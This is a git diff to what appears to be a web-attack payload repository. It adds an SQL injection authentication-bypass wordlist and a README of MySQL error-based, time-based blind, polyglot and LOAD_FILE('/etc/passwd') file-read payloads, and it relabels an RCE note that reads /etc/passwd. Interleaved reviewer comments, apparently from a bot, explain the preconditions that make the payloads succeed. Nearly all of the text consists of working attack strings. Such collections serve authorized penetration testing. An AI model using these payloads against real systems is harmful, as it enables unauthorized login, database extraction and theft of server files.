diff --git a/RCE/README.md b/RCE/README.md
index 9668908..b312836 100644
--- a/RCE/README.md
+++ b/RCE/README.md
@@ -2,7 +2,7 @@
 Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
-## Vuln
+## Exploits
 Normal code execution
 ```
 cat /etc/passwd
diff --git a/SQL_Injection/Authentication Bypass.txt b/SQL_Injection/Authentication Bypass.txt
new file mode 100755
index 0000000..527b2b2
--- /dev/null
+++ b/SQL_Injection/Authentication Bypass.txt
@@ -0,0 +1,77 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
\ No newline at end of file
diff --git a/SQL_Injection/README.md b/SQL_Injection/README.md
index c707ab4..01e42a5 100644
--- a/SQL_Injection/README.md
+++ b/SQL_Injection/README.md
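Review bot: The two UNION entries at the end of each half of the new wordlist (`1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055`) are not generic bypasses: they assume the login query selects exactly two columns and compares the second one against an unsalted MD5 of the submitted password, since 81dc9bdb52d04dc20036dbd8313ed055 is MD5("1234"). A tester pasting the list blindly will get column-count errors or nothing from these two lines on any other schema, so this should be documented; because every line of a .txt wordlist is a payload, the explanation belongs in the README that references the file (e.g. "the last entry of each block assumes a 2-column SELECT and MD5 passwords; the password to submit is 1234") rather than in the list. The `#` and `/*` terminators are MySQL comment syntax and the `--` variants need a trailing space or `+` when sent in a URL, which is also worth a sentence in the README.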
@@ -1,12 +1,58 @@
-# Title
-Lorem
+# SQL injection
+A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
-## Vuln
+## Exploit
+Detection of an SQL injection entry point
 ```
-Code
+'
+"
+%27
+" / %22
+; / %3B
+%%2727
+%25%27
+`+HERP
+'||'DERP
+'+'herp
+' ' DERP
+Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
+transformed into U+0022 QUOTATION MARK (")
+Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
+transformed into U+0027 APOSTROPHE (')
+```
+
+
+Authentication bypass - use the file "Authentication Bypass.txt"
+```
+SELECT id FROM users WHERE username='input1' AND password='input2'
+SELECT id FROM users WHERE username='' or true-- AND password='input2'
+```
+
+
+MySQL Error Based
+```
+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
+'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
+```
+
+
+MySQL Blind SQL
+```
++BENCHMARK(40000000,SHA1(1337))+
+```
+
+
+MySQL Read content of a file
+```
+' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
+```
+
+
+Polyglot injection (multicontext)
+```
+SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
\ No newline at end of file
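Review bot: The file-read payload `' UNION ALL SELECT LOAD_FILE('/etc/passwd') --` is presented without its preconditions, so a reader will assume it works whenever injection is confirmed: a UNION must return the same number of columns as the original SELECT (this one works only against a single-column query, otherwise pad with NULLs), and LOAD_FILE() additionally needs the FILE privilege, a file readable by the mysqld process, and a `secure_file_priv` setting that permits the path. I would add one line under that heading, e.g. `Requires FILE privilege and a permissive secure_file_priv; match the column count of the original query (..., NULL, NULL).` The bypass example `username='' or true-- AND password='input2'` relies on MySQL's `-- ` comment needing trailing whitespace; in a URL that space is stripped, so the README should mention encoding it as `--+` or `-- -`. The "MySQL Blind SQL" heading over `BENCHMARK(40000000,SHA1(1337))` would be clearer as "MySQL Blind (time-based)", since the whole point of the payload is a measurable delay rather than a visible result.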